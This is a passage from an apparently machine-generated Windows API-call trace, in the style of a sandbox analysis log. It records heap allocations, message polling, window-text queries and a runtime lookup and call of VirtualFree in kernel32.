out: lpClassName="IME") returned 3 [0203.449] GetWindowTextW (in: hWnd=0x10076, lpString=0x7df1a8, nMaxCount=1024 | out: lpString="Default IME") returned 11 [0203.449] GetClassNameW (in: hWnd=0x10076, lpClassName=0x7df1a8, nMaxCount=1024 | out: lpClassName="IME") returned 3 [0203.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75f8 | out: hHeap=0x12c0000) returned 1 [0203.449] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7538 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b75b0 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7568 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0203.491] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0203.491] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effe0 [0203.491] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.491] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e580 [0203.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e580 | out: hHeap=0x12c0000) returned 1 [0203.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff20 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff20 | out: hHeap=0x12c0000) returned 1 [0203.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e0c0 [0203.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.492] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e0c0 | out: hHeap=0x12c0000) returned 1 [0203.492] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0203.492] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0203.493] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0203.493] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00c0 [0203.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.493] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.493] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.494] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0203.494] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff30 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff30 | out: hHeap=0x12c0000) returned 1 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0203.494] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0203.494] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12effa0 [0203.494] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.494] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effa0 | out: hHeap=0x12c0000) returned 1 [0203.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0203.495] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0010 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7460 [0203.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0010 | out: hHeap=0x12c0000) returned 1 [0203.495] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7460 | out: hHeap=0x12c0000) returned 1 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x14) returned 0x1316600 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75b0 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effe0 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x60) returned 0x1304e30 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7628 [0203.495] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75f8 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7640 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7658 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7610 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7670 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7490 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7688 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b74a8 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b76b8 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b73d0 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7508 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7400 [0203.496] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7430 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7448 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7460 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b74c0 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7520 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b74d8 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b74f0 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7538 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7568 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7580 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7970 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7730 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7748 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b78c8 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b78e0 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7760 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76e8 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b77a8 [0203.497] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7898 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7940 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7718 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7778 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffed8 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7838 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff50 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7958 [0203.498] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff50 | out: hHeap=0x12c0000) returned 1 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7820 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0030 [0203.498] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7790 [0203.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0030 | out: hHeap=0x12c0000) returned 1 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b79b8 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0050 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b77c0 [0203.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0050 | out: hHeap=0x12c0000) returned 1 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7850 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0050 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b77d8 [0203.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0050 | out: hHeap=0x12c0000) returned 1 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7988 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00b0 [0203.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00b0 | out: hHeap=0x12c0000) returned 1 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b78b0 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0030 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76d0 [0203.499] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0030 | out: hHeap=0x12c0000) returned 1 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b79a0 [0203.499] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b78f8 [0203.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0000 | out: hHeap=0x12c0000) returned 1 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b77f0 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0070 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7808 [0203.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0070 | out: hHeap=0x12c0000) returned 1 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318de0 [0203.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ffed8 | out: hHeap=0x12c0000) returned 1 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7868 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff30 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7880 [0203.500] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff30 | out: hHeap=0x12c0000) returned 1 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff40 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7910 [0203.500] CharLowerBuffW (in: lpsz="dword", cchLength=0x5 | out: lpsz="dword") returned 0x5 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.500] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efed0 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff60 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efed0 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff60 | out: hHeap=0x12c0000) returned 1 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0000 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0040 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00a0 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0040 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.501] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efef0 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.501] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff80 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0010 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff80 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0010 | out: hHeap=0x12c0000) returned 1 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff00 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff70 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00c0 [0203.502] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff70 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.502] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0203.502] LoadLibraryW (lpLibFileName="kernel32") returned 0x74650000 [0203.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0010 [0203.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualFree", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0203.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14b7700 [0203.504] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualFree", cchWideChar=12, lpMultiByteStr=0x14b7700, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualFree", lpUsedDefaultChar=0x0) returned 12 [0203.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7700 | out: hHeap=0x12c0000) returned 1 [0203.504] GetProcAddress (hModule=0x74650000, lpProcName="VirtualFree") returned 0x74667600 [0203.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7928 | out: hHeap=0x12c0000) returned 1 [0203.504] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0010 | out: hHeap=0x12c0000) returned 1 [0203.504] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300220 [0203.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff90 [0203.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0040 [0203.505] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effd0 [0203.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff90 | out: hHeap=0x12c0000) returned 1 [0203.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f0040 | out: hHeap=0x12c0000) returned 1 [0203.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effd0 | out: hHeap=0x12c0000) returned 1 [0203.505] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300220 | out: hHeap=0x12c0000) returned 1 [0203.505] VirtualFree (lpAddress=0xea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effc0 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x13132c0 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7928 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7700 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7c88 [0203.506] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7b38 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f00a0 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7b38 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00a0 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7c88 | out: hHeap=0x12c0000) returned 1 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7b50 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7b98 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7a18 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff10 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7a18 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff10 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7b98 | out: hHeap=0x12c0000) returned 1 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7bb0 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7bc8 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7be0 [0203.507] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff30 [0203.507] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7be0 | out: hHeap=0x12c0000) returned 1 [0203.507] HeapFree (in: hHeap=0x12c0000, 